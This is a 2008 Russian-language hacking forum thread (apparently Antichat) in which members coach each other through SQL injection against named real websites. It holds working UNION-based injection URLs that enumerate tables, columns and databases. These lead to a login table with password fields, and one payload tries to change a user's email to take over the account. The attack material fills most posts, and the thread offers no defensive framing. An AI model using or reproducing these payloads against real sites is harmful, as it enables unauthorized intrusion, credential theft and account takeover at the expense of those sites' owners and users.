24.04.2008, 17:43
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
ваще странно, тут права рута
http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32+and+update+us ers+set+email='gg@gg.com'+where+username='jdeagnon '/*
вылетает ошибка. ' - не фильтруется
бывает 
Последний раз редактировалось bag; 24.04.2008 в 18:03..
|
|
|
24.04.2008, 18:02
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
не придумывайте, если инъекция в select запросе, то в мускуле никакие update и иже с ними не используешь
зы про grant вобще отжиг
__________________
Карфаген должен быть разрушен...
|
|
|
|
24.04.2008, 18:54
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Во, Скиппи за Велю )))))).Теперь как всегда вопрос :
Нашёл скулю(с кем не бывает,по сто за день: )).
Нашёл таблички:
http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,table_name,4+from+information_s chema.tables--
Нашёл колонки:
http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,column_name,4+from+information_ schema.columns--
К Mysql.user закрыт доступ, ибо не руткинс ).
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
А запрос похожий видел такой :
-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
(Бред какой-то имхо) (
Интересует, почему нету последних таблиц tbmember и tblogin(долго парился,перебирая имена).Таблицы с префиксом tbl существуют, но колонки от них не подходят(я не все перебрал).Просто колонка member_id по логике должна быть в tbmember. Что за бред?! (
Последний раз редактировалось Велемир; 24.04.2008 в 18:57..
|
|
|
|
24.04.2008, 19:09
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Велемир из твоего поста понял процентов 10, а вообще:
А запрос похожий видел такой :
-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
такого запроса ты видеть не мог, т.к он нарушает синтаксис, очевидно login_id должно быть в hex либо к кавычках при маджик_квотс_гпс= Офф
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
column_name+from+information_schema.columns+where+ table_name=hex(что -то)
Врят ли это колличество полей в таблице xD, видмо просто принтабельные колонки
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
24.04.2008, 19:27
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Ну а почему тогда tbmember,tblogin не существуют - это не таблицы чтоли ?(.
Кстати, если выполнить как ты сказал hex(abrakadabra), где абракадабра - имя таблицы,то вернёт 'Item comming soon',а если выполнить запрос сразу *хексанутый*, то выведет :
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C5F70686F74 6F67616C6C657279--
0x74626C5F70686F746F67616C6C657279 - это tbl_photogallery.
P.S: При запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C6F67696E-- ,где
0x74626C6F67696E - это tbmember, вернуло поля
login_id,login,password,user_name,access_level
Но при запросе
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,user_name,4+from+tblogin--
Выдаёт,что таблица не найдена. Как тут быть ?( В Hex пробывал
Последний раз редактировалось Велемир; 24.04.2008 в 19:43..
|
|
|
|
24.04.2008, 20:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Велемир
Когда ты прочитаешь хоть одну статью по скулям?
Эта таблица в другой базе
И предполагая твой следующий вопрос:
база test_sql
Вот вывод всех баз:
_http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,schema_name,3+from+information_ schema.schemata--
Последний раз редактировалось jokester; 24.04.2008 в 20:12..
|
|
|
|
24.04.2008, 22:16
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
эньекция? http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=-1
|
|
|
|
24.04.2008, 22:48
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
не так выразился ..
Последний раз редактировалось 159932; 25.04.2008 в 16:43..
Причина: не так выразился ..
|
|
|
|
25.04.2008, 11:00
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
159932, и что по твоему в этом странного?
|
|
|
|
25.04.2008, 11:18
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
159932, http://ru2.php.net/manual/ru/book.mssql.php
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
